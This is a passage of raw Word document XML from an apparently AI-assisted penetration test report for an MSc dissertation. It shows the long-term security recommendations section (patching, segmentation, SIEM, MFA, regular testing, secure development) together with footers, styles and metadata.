        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1B4F72"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">8.3 Long-Term Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement a vulnerability management programme with monthly scanning and 30-day patching SLAs for Critical findings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy network segmentation (VLANs, DMZ) to limit blast radius from any single compromise</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement centralised log management and SIEM alerting for authentication events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce a password policy and multi-factor authentication for all remote access services</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Adopt a regular penetration testing schedule (at minimum annually, or after major infrastructure changes)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Implement a secure software development lifecycle (SDLC) including code review and DAST for web applications</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">─────────────────────────────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Report generated by PentestMCP v2.1 | MSc Cybersecurity &amp; Digital Forensics Dissertation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">University of Wales Trinity Saint David | Supervisor: Dr. Suresh Shanmugasundaram | May 2026</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This report was generated with the assistance of AI analysis (Ollama / Groq / Gemini).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All findings should be independently verified by a qualified penetration tester before acting.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId7"/>
      <w:footerReference w:type="default" r:id="rId8"/>
      <w:pgSz w:w="11906" w:h="16838"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1B4F72" w:sz="4" w:space="1"/>
      </w:pBdr>
      <w:spacing w:before="80"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Generated: 21 May 2026  |  PentestMCP v2.1 (AI-Assisted)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B4F72" w:sz="4" w:space="1"/>
      </w:pBdr>
      <w:spacing w:after="120"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">PentestMCP Penetration Test Report  |  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:b/>
        <w:bCs/>
        <w:color w:val="C0392B"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">CONFIDENTIAL</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="7F8C8D"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">  |  Target: 192.168.64.2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20"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="0D2137"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="Heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="120" w:before="240"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1B4F72"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="Heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="80" w:before="160"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1B4F72"/>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Penetration Test Executive Report — 192.168.64.2</dc:title>
  <dc:creator>PentestMCP v2.1</dc:creator>
  <dc:description>Confidential penetration test report generated by PentestMCP</dc:description>
  <cp:lastModifiedBy>Un-named</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-21T17:19:31.832Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-21T17:19:31.833Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>